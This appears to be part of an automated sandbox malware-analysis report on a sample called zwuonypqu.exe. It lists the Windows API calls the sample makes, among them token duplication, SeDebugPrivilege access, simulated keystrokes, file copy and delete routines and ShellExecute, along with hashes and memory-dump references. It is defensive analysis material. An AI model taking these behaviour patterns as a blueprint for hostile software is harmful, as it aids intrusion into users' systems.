                        • Opcode ID: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                        • Instruction ID: 67ef268c6cd115d101ef856db97c2ea624f8e5cc5d3a941a6f1fba9d4c5b72b9
                        • Opcode Fuzzy Hash: d4f7479c18d2f3dc105ebfe0f2eac5810891221413fa193614bbe2c2ae41d224
                        • Instruction Fuzzy Hash: 07D01731901205AACB00FFAAD8067CC76706F04318F20819AB114662E2CB3C46C19A18
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: ProcWindow
                        • String ID:
                        • API String ID: 181713994-0
                        • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                        • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                        • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                        • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                        APIs
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __wfsopen
                        • String ID:
                        • API String ID: 197181222-0
                        • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                        • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                        • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                        • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                        APIs
                        • __encode_pointer.LIBCMT ref: 004169E2
                          • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416980
                          • Part of subcall function 0041696E: TlsGetValue.KERNEL32(00000003,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 00416997
                          • Part of subcall function 0041696E: RtlEncodePointer.NTDLL(00000000,?,004169E7,00000000,00422F48,00496770,00000000,00000314,?,00418216,00496770,Microsoft Visual C++ Runtime Library,00012010), ref: 004169D5
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Value$EncodePointer__encode_pointer
                        • String ID:
                        • API String ID: 2585649348-0
                        • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction ID: f62f3284a010ca3bbb159d13ec07db3ba5ef3bb17cb580217ffea2be35a92f46
                        • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                        • Instruction Fuzzy Hash:
                        APIs
                        • CloseHandle.KERNELBASE(00000000), ref: 0040D91D
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                        • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                        • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                        • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                        APIs
                        • Sleep.KERNELBASE(000001F4), ref: 03533141
                        Memory Dump Source
                        • Source File: 00000005.00000002.478937282.0000000003530000.00000040.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_3530000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction ID: 35e795c588776cadf6d003e1f5ae0ce988546701fa435f1531de2027cdc4e463
                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                        • Instruction Fuzzy Hash: 2DE0E67494010DDFDB00EFB8D54969E7FB4FF04301F1001A1FD01D2280D7309D508A62
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID:
                        • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                        • API String ID: 0-4260964411
                        • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                        • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                        • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                        • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                        APIs
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                        • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                        • GetKeyState.USER32(00000011), ref: 0047C1A4
                        • GetKeyState.USER32(00000009), ref: 0047C1AD
                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                        • GetKeyState.USER32(00000010), ref: 0047C1CA
                        • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                        • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                        • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                        • SendMessageW.USER32 ref: 0047C2FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: MessageSend$State$LongProcWindow
                        • String ID: @GUI_DRAGID$F
                        • API String ID: 1562745308-4164748364
                        • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                        • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                        • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                        • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                        APIs
                        • GetForegroundWindow.USER32 ref: 004375B3
                        • FindWindowW.USER32 ref: 004375D8
                        • IsIconic.USER32(?), ref: 004375E1
                        • ShowWindow.USER32(?,00000009), ref: 004375EE
                        • SetForegroundWindow.USER32(?), ref: 004375FD
                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                        • GetCurrentThreadId.KERNEL32(?,?,004448AF,?), ref: 00437619
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437632
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00437638
                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0043763E
                        • SetForegroundWindow.USER32(?), ref: 00437645
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                        • keybd_event.USER32 ref: 0043765D
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                        • keybd_event.USER32 ref: 00437674
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                        • keybd_event.USER32 ref: 0043768B
                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                        • keybd_event.USER32 ref: 004376A2
                        • SetForegroundWindow.USER32(?), ref: 004376AD
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376CD
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D3
                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004376D9
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                        • String ID: Shell_TrayWnd
                        • API String ID: 3778422247-2988720461
                        • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                        • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                        • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                        • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                        APIs
                        • _memset.LIBCMT ref: 0044621B
                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                        • CloseHandle.KERNEL32(?), ref: 0044628A
                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                        • GetProcessWindowStation.USER32 ref: 004462BD
                        • SetProcessWindowStation.USER32 ref: 004462C8
                        • OpenDesktopW.USER32 ref: 004462E4
                        • _wcslen.LIBCMT ref: 0044639E
                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                        • _wcsncpy.LIBCMT ref: 004463C7
                        • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                        • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                        • CreateProcessAsUserW.ADVAPI32 ref: 00446446
                        • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                        • CloseWindowStation.USER32(00000000), ref: 00446497
                        • CloseDesktop.USER32 ref: 0044649E
                        • SetProcessWindowStation.USER32 ref: 004464A9
                        • CloseHandle.KERNEL32(?), ref: 004464B4
                        • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                        • String ID: $default$winsta0
                        • API String ID: 2173856841-1027155976
                        • Opcode ID: d3d7071b18a170fafd9f7dadebeefd8dcd888919b9fb43bc072cde0a234b4214
                        • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                        • Opcode Fuzzy Hash: d3d7071b18a170fafd9f7dadebeefd8dcd888919b9fb43bc072cde0a234b4214
                        • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                        APIs
                          • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,004A8E80,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,0040F3D2), ref: 0040FFCA
                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                          • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                          • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                          • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                        • _wcscat.LIBCMT ref: 0044BD96
                        • _wcscat.LIBCMT ref: 0044BDBF
                        • __wsplitpath.LIBCMT ref: 0044BDEC
                        • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                        • _wcscpy.LIBCMT ref: 0044BE73
                        • _wcscat.LIBCMT ref: 0044BE85
                        • _wcscat.LIBCMT ref: 0044BE97
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                        • DeleteFileW.KERNEL32(?), ref: 0044BED5
                        • MoveFileW.KERNEL32 ref: 0044BEF5
                        • CopyFileW.KERNEL32 ref: 0044BF0C
                        • DeleteFileW.KERNEL32(?), ref: 0044BF17
                        • CopyFileW.KERNEL32 ref: 0044BF2E
                        • FindClose.KERNEL32(00000000), ref: 0044BF35
                        • MoveFileW.KERNEL32 ref: 0044BF51
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                        • FindClose.KERNEL32(00000000), ref: 0044BF7E
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                        • String ID: \*.*
                        • API String ID: 2188072990-1173974218
                        • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                        • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                        • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                        • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                        APIs
                        • __invoke_watson.LIBCMT ref: 004203A4
                          • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                          • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                          • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32 ref: 00417E79
                          • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?), ref: 00417E86
                          • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                          • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                        • __get_daylight.LIBCMT ref: 004203B0
                        • __invoke_watson.LIBCMT ref: 004203BF
                        • __get_daylight.LIBCMT ref: 004203CB
                        • __invoke_watson.LIBCMT ref: 004203DA
                        • ____lc_codepage_func.LIBCMT ref: 004203E2
                        • _strlen.LIBCMT ref: 00420442
                        • __malloc_crt.LIBCMT ref: 00420449
                        • _strlen.LIBCMT ref: 0042045F
                        • _strcpy_s.LIBCMT ref: 0042046D
                        • __invoke_watson.LIBCMT ref: 00420482
                        • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                        • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                        • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                          • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                          • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                          • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                          • Part of subcall function 00413A88: HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                          • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                        • __invoke_watson.LIBCMT ref: 004205CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                        • String ID: S\
                        • API String ID: 4084823496-393906132
                        • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                        • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                        • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                        • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                        APIs
                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                        • __swprintf.LIBCMT ref: 00434D91
                        • _wcslen.LIBCMT ref: 00434D9B
                        • _wcslen.LIBCMT ref: 00434DB0
                        • _wcslen.LIBCMT ref: 00434DC5
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                        • _memset.LIBCMT ref: 00434E27
                        • _wcslen.LIBCMT ref: 00434E3C
                        • _wcsncpy.LIBCMT ref: 00434E6F
                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                        • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                        • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                        • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                        • String ID: :$\$\??\%s
                        • API String ID: 302090198-3457252023
                        • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                        • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                        • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                        • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                        APIs
                          • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                        • GetLastError.KERNEL32 ref: 004644B4
                        • GetCurrentThread.KERNEL32(00000028,00000000,?), ref: 004644C8
                        • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                        • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                        Strings
                        Memory Dump Source
                        • Source File: 00000005.00000002.478424746.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000005.00000002.478413311.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478463983.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478469409.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000005.00000002.478483279.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_5_2_400000_zwuonypqu.jbxd
                        Similarity
                        • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                        • String ID: SeDebugPrivilege
                        • API String ID: 1312810259-2896544425
                        • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                        • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                        • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                        • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                        APIs
                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                          • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                          • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                          • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                        • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                        • GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                          • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                        • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000004), ref: 0040D7D6
                        • MessageBoxA.USER32 ref: 00431AAB
                        • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000004), ref: 00431B0E
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\AppData\Local\Temp\zwuonypqu.exe,00000004), ref: 00431B3F
                        • GetForegroundWindow.USER32 ref: 00431B8B
                        • ShellExecuteW.SHELL32(00000000), ref: 00431B92
